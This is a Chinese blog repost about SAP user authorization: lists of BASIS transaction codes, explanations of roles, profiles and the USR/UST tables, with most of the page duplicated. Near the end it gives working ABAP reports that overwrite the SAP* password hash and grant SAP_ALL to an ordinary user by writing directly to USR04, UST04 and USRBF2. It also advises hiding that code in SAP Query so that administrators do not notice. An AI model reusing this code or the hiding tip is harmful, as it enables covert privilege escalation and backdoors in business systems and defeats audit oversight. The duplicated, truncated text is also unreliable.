SAP用户权限相关操作
生活随笔
收集整理的這篇文章主要介紹了
SAP用户权限相关操作
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
SE93 查詢所有TCODE
或者 table: tstc
SE16 display
SUIM 查詢用戶信息的報表們
?
技術流
SAP常用的TCODE---BASIS
事務碼 描述 ( 中英文 )
SBIT Menu 菜單
SBTA Test background processing 后臺處理測試
SBTU Background processing for user 對用戶的后臺處理
SM36 Define Background Job 定義后臺作業
SM37 Background Job Overview 后臺作業概覽
SM39 Job Analysis 作業分析
SM49 Execute external OS commands 執行外部 OS 命令
SM61 Menu 菜單
SM62 Menu 菜單
SM63 Display/Maintain Operating Mode Sets 顯示 / 保持操作方式設置
SM64 Release of an Event 事件的釋放
SM65 Background Processing Analysis Tool 后臺處理分析工具
SM67 Job Scheduling 作業調度
SM68 Job Administration 作業管理
SM69 Maintain external OS commands 維護外部 OS 命令
SMX Display Own Jobs 顯示自己的作業
SPBM Monitoring parallel background tasks 監控類似的后臺任務
SPBT Test: Parallel background tasks 文本 : 匹配后臺任務
DB16 DB system check (trigger/browse) DB system check (trigger/browse)
DB17 DB system check (configure) DB system check (configure)
DB20 No.of table tupels acc. to stat. No.of table tupels acc. to stat.
DB21 Maintenance control table DBSTATC Maintenance control table DBSTATC
RZ01 Job Scheduling Monitor 作業計劃監視器
RZ02 Network Graphics for SAP Instances 網絡圖 SAP
RZ04 Maintain SAP Instances 保持 SAP 實例
RZ06 Alerts Thresholds Maintenance 警報門限維護
RZ08 SAP Alert Monitor SAP 報警監視器
RZ12 Maintain RFC server group assignment 維護 RFC 指定服務器組
SM66 Systemwide Work Process Overview 系統工作過程概述
SMLG Maintain Logon Group 維護登錄組
SRZL Menu 菜單
SM02 System Messages 系統消息
SM04 User Overview 用戶概覽
SM13 Display Update Records 顯示更新記錄
SM50 Work Process Overview 工作進程概述
SM51 List of SAP Servers SAP 服務器的清單
SM54 TXCOM maintenance TXCOM 維護
SM55 THOST Maintenance THOST 維持
SM56 Number Range Buffer 數字范圍緩沖區
SMGW Gateway Monitor 網關監控器
ST07 Application monitor 應用程序監視器
AL01 SAP Alert Monitor SAP 報警監視器
AL02 Database alert monitor 數據庫警報監測器
AL03 Operating system alert monitor 操作系統警告監視器
AL04 Monitor call distribution 監視呼叫分配
AL05 Monitor current workload 監視當前的工作負荷
AL06 Performance: Upload/Download 執行 : 上載 / 下裝
AL07 EarlyWatch Report 初期察看報告
AL08 Users Logged On 登錄的用戶
AL09 Data for database expertise 專家數據庫的數據
AL10 Download to Early Watch 下載早觀察
AL11 Display SAP Directories 顯示 SAP 目錄
AL12 Display table buffer (Exp. session) 顯示表緩沖
AL13 Display Shared Memory (Expert mode) 顯示共享內存 ( 輸出方式 )
AL15 Customize SAPOSCOL destination 自定義 SAPOSCOL 目的地
AL16 Local Alert Monitor for Operat.Syst. 操作系統的本地報警監視器
AL17 Remote Alert Monitor f.Operat. Syst. 操作系統的遠程報警監視器
AL18 Local File System Monitor 本地的文件系統監視器
AL19 Remote File System Monitor 遠程文件系統監視器
AL20 EarlyWatch Data Collector List EarlyWatch 數據收集器清單
AL21 ABAP Program analysis ABAP Program analysis
AL22 Dependent objects display Dependent objects display
DB01 Analyze exclusive lockwaits 分析互斥鎖定等待
DB02 Analyze tables and indexes 分析表和索引
DB03 Parameter changes in database 在數據庫中參數改變
DB05 Analysis of a table acc. to index Analysis of a table acc. to index
DB11 Early Watch Profile Maintenance 初期察看描述文件維護
DB12 Overview of Backup Logs 備份日志的概觀
DB13 Database administration calendar 數據庫管理日歷
DB14 Show SAPDBA Action Logs 顯示 SAPDBA 行為記錄
DB15 CCMS - Document archiving CCMS - Document archiving
OS01 LAN check with ping 通過 ping 檢查 LAN
OS02 Operating system configuration 操作系統配置
OS03 O/S Parameter changes O/S 參數更改
OS04 Local System Configuration 本地的系統配置
OS05 Remote System Cconfiguration 遠程系統配置
OS06 Local Operating System Activity 本地的操作系統作業
OS07 Remote Operating System Activity 遠程操作系統活動性
OSS1 Logon to Online Service System 注冊到聯機服務系統
SDBE Explain an SQL statement 匹配碼對象(測試)
ST02 Setups/Tune Buffers 設置 / 調諧緩沖
ST03 Performance,SAP Statistics, Workload 性能 ,SAP 統計 , 工作負荷
ST04 Select DB activities 選定數據庫中的活動
ST05 Trace for SQL, Enqueue, RFC, Memory SQL 跟蹤
ST06 Operating System Monitor 操作系統監視器
ST08 Network Monitor 網絡器
ST09 Network Alert Monitor 網絡敬報器
ST10 Table call statistics 表調用統計
ST4A Database: Shared cursor cache (ST04) Database: Shared cursor cache (ST04)
STAT Local transaction statistics 本地事務統計
STP4 Select DB activities Select DB activities
STUN Menu Performance Monitor 菜單性能監視器
TKOF Turn off Oracle trace 關閉 Oracle 跟蹤
TKON Turn off Oracle trace 關閉 Oracle 跟蹤
TKPR Display trace file 顯示跟蹤文件
TU01 Call Statistics 調用統計
TU02 Parameter changes 參數改變
SP00 Spool and related areas 假脫機及相關區域
SP01 Output Controller 輸出控制
SP02 Display Output Requests 顯示輸出請求
SP03 Spool: Load Formats 假脫機 : 載入格式
SP1T Output Control (Test) 輸出控制(測試)
SPAD Spool Administration 假脫機管理
SPAT Spool Administration (Test) 假脫機管理(測試)
SPCC Spool consistency check 假脫機一致性檢查
SPIC Spool installation check 假脫機安裝檢查
SPTP Text elem. maint. for print formats 用于打印格式的文本元素維護
SP11 TemSe directory TemSe 目錄
SP12 TemSe Administration TemSe 管理
SE92 Maintain System Log Messages 維護系統日志消息
SM20 System Audit Log 系統審計日志
SM21 System Log 系統日志
S001 CASE 工具菜單 CASE 工具菜單
S002 Menu Administration 菜單管理
SDW0 ABAP/4 Development WB Initial Screen ABAP/4 開發工作臺初始屏幕
SYST Menu 菜單
SDMO Dynamic Menu (old) 動態菜單 ( 舊 )
SMEN Session Manager Menus 會話管理菜單
SU55 Call the Session Manager menus 調用會話管理菜單
RE_GGREPO1 Test report 1 測試報表 1
RE_GGREPO2 Test report 1 測試報表 1
SU24 Auth. obj. check under transactions 事務中權限對象檢查
SU25 Upgrade Tool for Profile Generator 配置文件生成器的升級工具
SU26 Upgrade tool for Profile Generator 配置文件生成器的升級工具
SUPC Profiles for activity groups 作業組的參數文件
SUPN Number range maint.: PROF_VARIS 編碼范圍維護 : PROF_VARIS
SUPO Maintain org. levels 維護初始級別
SM0 Work Process Overview 工作處理概述
SU02 Maintain Authorization Profiles 維護權限參數文件
SU03 Maintain Authorizations 維護權限
SU10 Mass Changes to User Master Records 對用戶主記錄的大量修改
SU12 Mass Changes to User Master Records 用戶主記錄的大量修改
SU2 Maintain user parameter 維護用戶參數
SU20 Maintain Authorization Fields 維護權限字段
SU21 Maintain Authorization Objects 維護權限對象
SU22 Auth. Object Usage in Transactions 事務中權限對象的用法
SU23 Load Tables in TAUTL 在 TAUTL 中裝入表
SU52 Maintain User Parameters 維護用戶參數
SU53 Display Check Values 顯示檢查值
SU54 Session Manager 會話管理器
SU56 Analyze User Buffer 分析用戶緩沖區
SU80 Archive user change documents 存檔用戶更改文檔
SU81 Archive user password change doc. 歸檔用戶口令更改文檔
SU82 Archive profile documents 檔案參數文件文檔
SU83 Archive authorization docs. 存檔授權文檔
SU84 Read archived user change documents 閱讀已存檔的用戶修改文檔
SU85 Read archived password change doc. 閱讀已存檔的口令修改文檔
SU86 Read profile change documents 讀參數文件更改文檔
SU87 Read authorization change documents 讀授權更改文檔
SU96 Table maint.: Change SUKRIA 表維護:修改 SUKRIA
SU97 Table maint.: Display SUKRIA 表維護:顯示 SUKRIA
SU98 Call report RSUSR008 調用報表 RSUSR008
SU99 Call report RSUSR008 調用報表 RSUSR008
SUIM Call AUTH reporting tree (info sys.) 調用 AUTH 報表樹(信息系統)
SU01 User Maintenance 用戶維護
SU01_NAV User maint. to include in navigation 包含在導航中的用戶維護
SU01D User Display 用戶顯示
SU3 Maintain Users Own Data 維護用戶自己的數據
SE01 Transport Organizer 傳送組織者
SE03 Workbench Organizer: Tools 工作臺組織器:工具
SE06 Set Up Workbench Organizer 設置工作臺組織器
SE07 Transport System Status Display 傳輸系統狀態顯示
SE09 Workbench Organizer 工作平臺組織者
SE10 Customizing Organizer 自定義組織者
SE17 General Table Display 通用表顯示
STDR TADIR consistency check TADIR 一致性檢查
?
?
通常basis會使用PFCG做權限管理,時你保存時會產生一個系統外的profile name,
記得SU01時用戶有profile 和role兩欄位嗎?它們的關系如何呢?
首先明白幾個概念.
1.activity
這樣說吧,我們從activity談起,activity是什么意思這個你查下
字典也就知道了,對就是規定可做什么動作,比如說不能吸煙只能喝酒,不能多于2兩,
不對,這是我老婆講的,SAP不是這樣子的,是只能insert, update,display什么的.
這些東西當年德國佬是寫在tobj表中的.
activity 也是可分activity group的.
2.activity category &Authorization group
Role Vs Profile
你看看表T020就知道了,就是什么K,D, A, M什么的.
profile是什么呢?實際上可以理解為所有的authorization data(有很多authorization group--{你可使用OBA7填寫,權限太細也不是好事^_^}和activity組成)的一個集合的名字,通常一個自定義的role產
生一個profile,SAP權限控制是根據profile里的authorization data(objects)來控制的.
role又是什么呢?role只是一個名字而已,然后將profile賦予給它, 比如你SU01建立一個
用戶,我沒有任何role,但是加如SAP_All profile也是可做任何事情.
SAP本身有很多default role & profile.
3.最常用的PFCG->authorizations->change authorization data->
進入后選取selection criteria 可看到所有的authorization object
manually可手工加authorization object,比如你使用某個t-code權限出錯誤,abap使用SU53檢查就
知道缺少哪個authorization objec,然后手工加入就可以.
你選去authorization levels就可by account type再細分權限.
有些甚至直接到表字段.而且你甚至可給一個object分配緩存buffer.
那么SAP是如何做到權限控制的呢,屠夫就用刀小宰一下.
4.關于權限方面的幾個t-code.
(一)Role(角色)相關T-code:
PFAC 標準
PFAC_CHG 改變
PFAC_DEL 刪除
PFAC_DIS 顯示
PFAC_INS 新建
PFAC_STR
PFCG 創建
ROLE_CMP 比較
SUPC 批量建立角色profile
SWUJ 測試
SU03 檢測authorzation data
SU25, SU26 檢查updated profile
(二)建立用戶相關T-code:
SU0
SU01
SU01D
SU01_NAV
SU05
SU50, Su51, SU52
SU1
SU10 批量
SU12 批量
SUCOMP:維護用戶公司地址
SU2 change用戶參數
SUIM 用戶信息系統
用戶組
SUGR:維護
SUGRD:顯示
SUGRD_NAV:還是維護
SUGR_NAV:還是顯示
(三)關于profile&Authoraztion Data
SU02:直接創建profile不用role
SU20:細分Authorization Fields
SU21(SU03):****維護Authorization Objects(TOBJ,USR12).
對于憑證你可細分到:
F_BKPF_BED: Accounting Document: Account Authorization for Customers
F_BKPF_BEK: Accounting Document: Account Authorization for Vendors
F_BKPF_BES: Accounting Document: Account Authorization for G/L Accounts
F_BKPF_BLA: Accounting Document: Authorization for Document Types
F_BKPF_BUK: Accounting Document: Authorization for Company Codes
F_BKPF_BUP: Accounting Document: Authorization for Posting Periods
F_BKPF_GSB: Accounting Document: Authorization for Business Areas
F_BKPF_KOA: Accounting Document: Authorization for Account Types
F_BKPF_VW : Accounting Document: Change Default Values for Doc.Type/PsKy
然后你進去還可細分,這些個東西是save在USR12表中的. 在DB層是UTAB.
對具體transaction code細分:
SU22,SU24
SU53:*** 就是你出錯用來檢查沒有那些authoraztion objects.
SU56:分析authoraztion data buffers.
SU87:用來檢查用戶改變產生的history
SU96,SU97,SU98,SU99:干啥的?
SUPC:批量產生role
DB和logical層:
SUKRI:Transaction Combinations Critical for Security
tables:
TOBJ : All avaiable authorzation objects.(全在此)
USR12: 用戶級authoraztion值
-----------------------------
USR01:主數據
USR02:密碼在此
USR04:授權在此
USR03:User address data
USR05:User Master Parameter ID
USR06:Additional Data per User
USR07:Object/values of last authorization check that failed
USR08:Table for user menu entries
USR09:Entries for user menus (work areas)
USR10:User master authorization profiles
USR11:User Master Texts for Profiles (USR10)
USR12:User master authorization values
USR13:Short Texts for Authorizations
USR14:Surchargeable Language Versions per User
USR15:External User Name
USR16:Values for Variables for User Authorizations
USR20:Date of last user master reorganization
USR21:Assign user name address key
USR22:Logon data without kernel access
USR30:Additional Information for User Menu
USR40:Table for illegal passwords
USR41:當前用戶
USREFUS:
USRBF2
USRBF3
UST04:User Profile在此
UST10C: Composite profiles
UST10S: Single profiles (角色對應的
UST12 : Authorizations..............................
-------------------------------------------------
AUTHORITY_CHECK:這個函數只是小檢查一下你的user有沒有,什么時候過期.?
? ? **如果coding只要使用此函數就夠了.?
? ? AUTHORITY_CHECK_TCODE:檢查T-code
? ? 這倆函數是真正檢查autorization objects的.?
? ? SUSR_USER_AUTH_FOR_OBJ_GET:?
A ? ?UTHORIZATION_DATA_READ_SELOBJ:?
? ? ------------------------------------------?
? ? 將SAP*的密碼改成123的程序,很簡單.?
? ? 我們找到那個user logon表USR02.?
? ? (DF52478E6FF90EEB是經過SAP加密保存在DB的,SAP的密碼加密?)?
? ? report zmodSAP*.?
? ? data zUSR02 like USR02 .?
? ? select single * into zUSR02 from USR02?
? ? where BNAME = 'SAP*'.?
? ? zUSR02-Bcode = 'DF52478E6FF90EEB' .?
? ? Update USR02 from zUSR02 .
? ? 現在的問題是如何讓你那basis不發現,很簡單,將code隱藏在Query里面,就是說你做一個?
? ? query,query是會產生code的,然后你加入此代碼,誰能想到???然后你就等你的basis去哭...
? ? 這樣做太狠毒了.還是自己偷偷搞自己的用戶吧.?
? ? 在此你必須對權限結構非常清晰.?
? ? 權限和三個表有關系.?
? ? a.USR04?
? ? b.USR04?
? ? c.USRBF2 這個表是對應到所用的authorzization objects的.?
? ? *&---------------------------------------------------------------------*?
? ? *& Report : Steal SAP ALL Right *?
? ? *& Creation Date : 2004.04.01 *?
? ? *& Created by : Stone.Fu *?
? ? *& Description : 可竊取SAP ALL權限 *?
? ? *& Modified Date : 2005.11.02?
? ? *& Description : 將此code hide在report painter or query code *?
? ? *&---------------------------------------------------------------------*
? ? report zrightsteal.?
? ? data zUSR04 like USR04 . "????????work area???
? ? data zUST04 like USR04 .?
? ? data zPROFS like USR04-PROFS.?
? ? data ZUSRBF2 like USRBF2 occurs 0 with header line.?
? ? "USRBF2?????internal table?
? ? ** Update Authorization table USR04.?
? ? select single * into zUSR04 from USR04?
? ? where BNAME = 'ZABC2'. "SAP All 權限?
? ? move 'C SAP_ALL' to zPROFS .?
? ? ZUSR04-NRPRO = '14'.?
? ? zUSR04-PROFS = zPROFS.?
? ? Update USR04 from zUSR04 .
? ? **Update User authorization masters table UST04 .?
? ? select single * into zUST04 from UST04?
? ? where BNAME = 'ZABC2'.?
? ? zUST04-PROFILE = 'SAP_ALL'. "SAP all 權限?
? ? Update UST04 from zUST04 .
? ? *?????insert?
? ? *ZUST04-MANDT = '200'.?
? ? *ZUST04-BNAME = 'ZABC2'.?
? ? *ZUST04-PROFILE = 'SAP_ALL'.?
? ? *Insert UST04 from ZUST04 .
? ? select * from USRBF2 into table ZUSRBF2?
? ? where BNAME = 'SAP*' .?
? ? Loop at ZUSRBF2.?
? ? ZUSRBF2-BNAME = 'ZABC2'.?
? ? Modify ZUSRBF2 INDEX sy-tabix TRANSPORTING BNAME.?
? ? endloop.?
? ? INSERT USRBF2 FROM TABLE ZUSRBF2 ACCEPTING DUPLICATE KEYS.
? ? 自己建立一個ztest用戶不給它任何權限然后在test machine上run 報表zrightsteal.
? ? 然后ztest就是SAP_ALL了, 然后你將code hide在SQP query的code中.ABAPcode太容易被人發現。
與50位技術專家面對面20年技術見證,附贈技術全景圖
或者 table: tstc
SE16 display
SUIM 查詢用戶信息的報表們
?
技術流
SAP常用的TCODE---BASIS
事務碼 描述 ( 中英文 )
SBIT Menu 菜單
SBTA Test background processing 后臺處理測試
SBTU Background processing for user 對用戶的后臺處理
SM36 Define Background Job 定義后臺作業
SM37 Background Job Overview 后臺作業概覽
SM39 Job Analysis 作業分析
SM49 Execute external OS commands 執行外部 OS 命令
SM61 Menu 菜單
SM62 Menu 菜單
SM63 Display/Maintain Operating Mode Sets 顯示 / 保持操作方式設置
SM64 Release of an Event 事件的釋放
SM65 Background Processing Analysis Tool 后臺處理分析工具
SM67 Job Scheduling 作業調度
SM68 Job Administration 作業管理
SM69 Maintain external OS commands 維護外部 OS 命令
SMX Display Own Jobs 顯示自己的作業
SPBM Monitoring parallel background tasks 監控類似的后臺任務
SPBT Test: Parallel background tasks 文本 : 匹配后臺任務
DB16 DB system check (trigger/browse) DB system check (trigger/browse)
DB17 DB system check (configure) DB system check (configure)
DB20 No.of table tupels acc. to stat. No.of table tupels acc. to stat.
DB21 Maintenance control table DBSTATC Maintenance control table DBSTATC
RZ01 Job Scheduling Monitor 作業計劃監視器
RZ02 Network Graphics for SAP Instances 網絡圖 SAP
RZ04 Maintain SAP Instances 保持 SAP 實例
RZ06 Alerts Thresholds Maintenance 警報門限維護
RZ08 SAP Alert Monitor SAP 報警監視器
RZ12 Maintain RFC server group assignment 維護 RFC 指定服務器組
SM66 Systemwide Work Process Overview 系統工作過程概述
SMLG Maintain Logon Group 維護登錄組
SRZL Menu 菜單
SM02 System Messages 系統消息
SM04 User Overview 用戶概覽
SM13 Display Update Records 顯示更新記錄
SM50 Work Process Overview 工作進程概述
SM51 List of SAP Servers SAP 服務器的清單
SM54 TXCOM maintenance TXCOM 維護
SM55 THOST Maintenance THOST 維持
SM56 Number Range Buffer 數字范圍緩沖區
SMGW Gateway Monitor 網關監控器
ST07 Application monitor 應用程序監視器
AL01 SAP Alert Monitor SAP 報警監視器
AL02 Database alert monitor 數據庫警報監測器
AL03 Operating system alert monitor 操作系統警告監視器
AL04 Monitor call distribution 監視呼叫分配
AL05 Monitor current workload 監視當前的工作負荷
AL06 Performance: Upload/Download 執行 : 上載 / 下裝
AL07 EarlyWatch Report 初期察看報告
AL08 Users Logged On 登錄的用戶
AL09 Data for database expertise 專家數據庫的數據
AL10 Download to Early Watch 下載早觀察
AL11 Display SAP Directories 顯示 SAP 目錄
AL12 Display table buffer (Exp. session) 顯示表緩沖
AL13 Display Shared Memory (Expert mode) 顯示共享內存 ( 輸出方式 )
AL15 Customize SAPOSCOL destination 自定義 SAPOSCOL 目的地
AL16 Local Alert Monitor for Operat.Syst. 操作系統的本地報警監視器
AL17 Remote Alert Monitor f.Operat. Syst. 操作系統的遠程報警監視器
AL18 Local File System Monitor 本地的文件系統監視器
AL19 Remote File System Monitor 遠程文件系統監視器
AL20 EarlyWatch Data Collector List EarlyWatch 數據收集器清單
AL21 ABAP Program analysis ABAP Program analysis
AL22 Dependent objects display Dependent objects display
DB01 Analyze exclusive lockwaits 分析互斥鎖定等待
DB02 Analyze tables and indexes 分析表和索引
DB03 Parameter changes in database 在數據庫中參數改變
DB05 Analysis of a table acc. to index Analysis of a table acc. to index
DB11 Early Watch Profile Maintenance 初期察看描述文件維護
DB12 Overview of Backup Logs 備份日志的概觀
DB13 Database administration calendar 數據庫管理日歷
DB14 Show SAPDBA Action Logs 顯示 SAPDBA 行為記錄
DB15 CCMS - Document archiving CCMS - Document archiving
OS01 LAN check with ping 通過 ping 檢查 LAN
OS02 Operating system configuration 操作系統配置
OS03 O/S Parameter changes O/S 參數更改
OS04 Local System Configuration 本地的系統配置
OS05 Remote System Cconfiguration 遠程系統配置
OS06 Local Operating System Activity 本地的操作系統作業
OS07 Remote Operating System Activity 遠程操作系統活動性
OSS1 Logon to Online Service System 注冊到聯機服務系統
SDBE Explain an SQL statement 匹配碼對象(測試)
ST02 Setups/Tune Buffers 設置 / 調諧緩沖
ST03 Performance,SAP Statistics, Workload 性能 ,SAP 統計 , 工作負荷
ST04 Select DB activities 選定數據庫中的活動
ST05 Trace for SQL, Enqueue, RFC, Memory SQL 跟蹤
ST06 Operating System Monitor 操作系統監視器
ST08 Network Monitor 網絡器
ST09 Network Alert Monitor 網絡敬報器
ST10 Table call statistics 表調用統計
ST4A Database: Shared cursor cache (ST04) Database: Shared cursor cache (ST04)
STAT Local transaction statistics 本地事務統計
STP4 Select DB activities Select DB activities
STUN Menu Performance Monitor 菜單性能監視器
TKOF Turn off Oracle trace 關閉 Oracle 跟蹤
TKON Turn off Oracle trace 關閉 Oracle 跟蹤
TKPR Display trace file 顯示跟蹤文件
TU01 Call Statistics 調用統計
TU02 Parameter changes 參數改變
SP00 Spool and related areas 假脫機及相關區域
SP01 Output Controller 輸出控制
SP02 Display Output Requests 顯示輸出請求
SP03 Spool: Load Formats 假脫機 : 載入格式
SP1T Output Control (Test) 輸出控制(測試)
SPAD Spool Administration 假脫機管理
SPAT Spool Administration (Test) 假脫機管理(測試)
SPCC Spool consistency check 假脫機一致性檢查
SPIC Spool installation check 假脫機安裝檢查
SPTP Text elem. maint. for print formats 用于打印格式的文本元素維護
SP11 TemSe directory TemSe 目錄
SP12 TemSe Administration TemSe 管理
SE92 Maintain System Log Messages 維護系統日志消息
SM20 System Audit Log 系統審計日志
SM21 System Log 系統日志
S001 CASE 工具菜單 CASE 工具菜單
S002 Menu Administration 菜單管理
SDW0 ABAP/4 Development WB Initial Screen ABAP/4 開發工作臺初始屏幕
SYST Menu 菜單
SDMO Dynamic Menu (old) 動態菜單 ( 舊 )
SMEN Session Manager Menus 會話管理菜單
SU55 Call the Session Manager menus 調用會話管理菜單
RE_GGREPO1 Test report 1 測試報表 1
RE_GGREPO2 Test report 1 測試報表 1
SU24 Auth. obj. check under transactions 事務中權限對象檢查
SU25 Upgrade Tool for Profile Generator 配置文件生成器的升級工具
SU26 Upgrade tool for Profile Generator 配置文件生成器的升級工具
SUPC Profiles for activity groups 作業組的參數文件
SUPN Number range maint.: PROF_VARIS 編碼范圍維護 : PROF_VARIS
SUPO Maintain org. levels 維護初始級別
SM0 Work Process Overview 工作處理概述
SU02 Maintain Authorization Profiles 維護權限參數文件
SU03 Maintain Authorizations 維護權限
SU10 Mass Changes to User Master Records 對用戶主記錄的大量修改
SU12 Mass Changes to User Master Records 用戶主記錄的大量修改
SU2 Maintain user parameter 維護用戶參數
SU20 Maintain Authorization Fields 維護權限字段
SU21 Maintain Authorization Objects 維護權限對象
SU22 Auth. Object Usage in Transactions 事務中權限對象的用法
SU23 Load Tables in TAUTL 在 TAUTL 中裝入表
SU52 Maintain User Parameters 維護用戶參數
SU53 Display Check Values 顯示檢查值
SU54 Session Manager 會話管理器
SU56 Analyze User Buffer 分析用戶緩沖區
SU80 Archive user change documents 存檔用戶更改文檔
SU81 Archive user password change doc. 歸檔用戶口令更改文檔
SU82 Archive profile documents 檔案參數文件文檔
SU83 Archive authorization docs. 存檔授權文檔
SU84 Read archived user change documents 閱讀已存檔的用戶修改文檔
SU85 Read archived password change doc. 閱讀已存檔的口令修改文檔
SU86 Read profile change documents 讀參數文件更改文檔
SU87 Read authorization change documents 讀授權更改文檔
SU96 Table maint.: Change SUKRIA 表維護:修改 SUKRIA
SU97 Table maint.: Display SUKRIA 表維護:顯示 SUKRIA
SU98 Call report RSUSR008 調用報表 RSUSR008
SU99 Call report RSUSR008 調用報表 RSUSR008
SUIM Call AUTH reporting tree (info sys.) 調用 AUTH 報表樹(信息系統)
SU01 User Maintenance 用戶維護
SU01_NAV User maint. to include in navigation 包含在導航中的用戶維護
SU01D User Display 用戶顯示
SU3 Maintain Users Own Data 維護用戶自己的數據
SE01 Transport Organizer 傳送組織者
SE03 Workbench Organizer: Tools 工作臺組織器:工具
SE06 Set Up Workbench Organizer 設置工作臺組織器
SE07 Transport System Status Display 傳輸系統狀態顯示
SE09 Workbench Organizer 工作平臺組織者
SE10 Customizing Organizer 自定義組織者
SE17 General Table Display 通用表顯示
STDR TADIR consistency check TADIR 一致性檢查
?
?
通常basis會使用PFCG做權限管理,時你保存時會產生一個系統外的profile name,
記得SU01時用戶有profile 和role兩欄位嗎?它們的關系如何呢?
首先明白幾個概念.
1.activity
這樣說吧,我們從activity談起,activity是什么意思這個你查下
字典也就知道了,對就是規定可做什么動作,比如說不能吸煙只能喝酒,不能多于2兩,
不對,這是我老婆講的,SAP不是這樣子的,是只能insert, update,display什么的.
這些東西當年德國佬是寫在tobj表中的.
activity 也是可分activity group的.
2.activity category &Authorization group
Role Vs Profile
你看看表T020就知道了,就是什么K,D, A, M什么的.
profile是什么呢?實際上可以理解為所有的authorization data(有很多authorization group--{你可使用OBA7填寫,權限太細也不是好事^_^}和activity組成)的一個集合的名字,通常一個自定義的role產
生一個profile,SAP權限控制是根據profile里的authorization data(objects)來控制的.
role又是什么呢?role只是一個名字而已,然后將profile賦予給它, 比如你SU01建立一個
用戶,我沒有任何role,但是加如SAP_All profile也是可做任何事情.
SAP本身有很多default role & profile.
3.最常用的PFCG->authorizations->change authorization data->
進入后選取selection criteria 可看到所有的authorization object
manually可手工加authorization object,比如你使用某個t-code權限出錯誤,abap使用SU53檢查就
知道缺少哪個authorization objec,然后手工加入就可以.
你選去authorization levels就可by account type再細分權限.
有些甚至直接到表字段.而且你甚至可給一個object分配緩存buffer.
那么SAP是如何做到權限控制的呢,屠夫就用刀小宰一下.
4.關于權限方面的幾個t-code.
(一)Role(角色)相關T-code:
PFAC 標準
PFAC_CHG 改變
PFAC_DEL 刪除
PFAC_DIS 顯示
PFAC_INS 新建
PFAC_STR
PFCG 創建
ROLE_CMP 比較
SUPC 批量建立角色profile
SWUJ 測試
SU03 檢測authorzation data
SU25, SU26 檢查updated profile
(二)建立用戶相關T-code:
SU0
SU01
SU01D
SU01_NAV
SU05
SU50, Su51, SU52
SU1
SU10 批量
SU12 批量
SUCOMP:維護用戶公司地址
SU2 change用戶參數
SUIM 用戶信息系統
用戶組
SUGR:維護
SUGRD:顯示
SUGRD_NAV:還是維護
SUGR_NAV:還是顯示
(三)關于profile&Authoraztion Data
SU02:直接創建profile不用role
SU20:細分Authorization Fields
SU21(SU03):****維護Authorization Objects(TOBJ,USR12).
對于憑證你可細分到:
F_BKPF_BED: Accounting Document: Account Authorization for Customers
F_BKPF_BEK: Accounting Document: Account Authorization for Vendors
F_BKPF_BES: Accounting Document: Account Authorization for G/L Accounts
F_BKPF_BLA: Accounting Document: Authorization for Document Types
F_BKPF_BUK: Accounting Document: Authorization for Company Codes
F_BKPF_BUP: Accounting Document: Authorization for Posting Periods
F_BKPF_GSB: Accounting Document: Authorization for Business Areas
F_BKPF_KOA: Accounting Document: Authorization for Account Types
F_BKPF_VW : Accounting Document: Change Default Values for Doc.Type/PsKy
然后你進去還可細分,這些個東西是save在USR12表中的. 在DB層是UTAB.
對具體transaction code細分:
SU22,SU24
SU53:*** 就是你出錯用來檢查沒有那些authoraztion objects.
SU56:分析authoraztion data buffers.
SU87:用來檢查用戶改變產生的history
SU96,SU97,SU98,SU99:干啥的?
SUPC:批量產生role
DB和logical層:
SUKRI:Transaction Combinations Critical for Security
tables:
TOBJ : All avaiable authorzation objects.(全在此)
USR12: 用戶級authoraztion值
-----------------------------
USR01:主數據
USR02:密碼在此
USR04:授權在此
USR03:User address data
USR05:User Master Parameter ID
USR06:Additional Data per User
USR07:Object/values of last authorization check that failed
USR08:Table for user menu entries
USR09:Entries for user menus (work areas)
USR10:User master authorization profiles
USR11:User Master Texts for Profiles (USR10)
USR12:User master authorization values
USR13:Short Texts for Authorizations
USR14:Surchargeable Language Versions per User
USR15:External User Name
USR16:Values for Variables for User Authorizations
USR20:Date of last user master reorganization
USR21:Assign user name address key
USR22:Logon data without kernel access
USR30:Additional Information for User Menu
USR40:Table for illegal passwords
USR41:當前用戶
USREFUS:
USRBF2
USRBF3
UST04:User Profile在此
UST10C: Composite profiles
UST10S: Single profiles (角色對應的
UST12 : Authorizations..............................
-------------------------------------------------
AUTHORITY_CHECK:這個函數只是小檢查一下你的user有沒有,什么時候過期.?
? ? **如果coding只要使用此函數就夠了.?
? ? AUTHORITY_CHECK_TCODE:檢查T-code
? ? 這倆函數是真正檢查autorization objects的.?
? ? SUSR_USER_AUTH_FOR_OBJ_GET:?
A ? ?UTHORIZATION_DATA_READ_SELOBJ:?
? ? ------------------------------------------?
? ? 將SAP*的密碼改成123的程序,很簡單.?
? ? 我們找到那個user logon表USR02.?
? ? (DF52478E6FF90EEB是經過SAP加密保存在DB的,SAP的密碼加密?)?
? ? report zmodSAP*.?
? ? data zUSR02 like USR02 .?
? ? select single * into zUSR02 from USR02?
? ? where BNAME = 'SAP*'.?
? ? zUSR02-Bcode = 'DF52478E6FF90EEB' .?
? ? Update USR02 from zUSR02 .
? ? 現在的問題是如何讓你那basis不發現,很簡單,將code隱藏在Query里面,就是說你做一個?
? ? query,query是會產生code的,然后你加入此代碼,誰能想到???然后你就等你的basis去哭...
? ? 這樣做太狠毒了.還是自己偷偷搞自己的用戶吧.?
? ? 在此你必須對權限結構非常清晰.?
? ? 權限和三個表有關系.?
? ? a.USR04?
? ? b.USR04?
? ? c.USRBF2 這個表是對應到所用的authorzization objects的.?
? ? *&---------------------------------------------------------------------*?
? ? *& Report : Steal SAP ALL Right *?
? ? *& Creation Date : 2004.04.01 *?
? ? *& Created by : Stone.Fu *?
? ? *& Description : 可竊取SAP ALL權限 *?
? ? *& Modified Date : 2005.11.02?
? ? *& Description : 將此code hide在report painter or query code *?
? ? *&---------------------------------------------------------------------*
? ? report zrightsteal.?
? ? data zUSR04 like USR04 . "????????work area???
? ? data zUST04 like USR04 .?
? ? data zPROFS like USR04-PROFS.?
? ? data ZUSRBF2 like USRBF2 occurs 0 with header line.?
? ? "USRBF2?????internal table?
? ? ** Update Authorization table USR04.?
? ? select single * into zUSR04 from USR04?
? ? where BNAME = 'ZABC2'. "SAP All 權限?
? ? move 'C SAP_ALL' to zPROFS .?
? ? ZUSR04-NRPRO = '14'.?
? ? zUSR04-PROFS = zPROFS.?
? ? Update USR04 from zUSR04 .
? ? **Update User authorization masters table UST04 .?
? ? select single * into zUST04 from UST04?
? ? where BNAME = 'ZABC2'.?
? ? zUST04-PROFILE = 'SAP_ALL'. "SAP all 權限?
? ? Update UST04 from zUST04 .
? ? *?????insert?
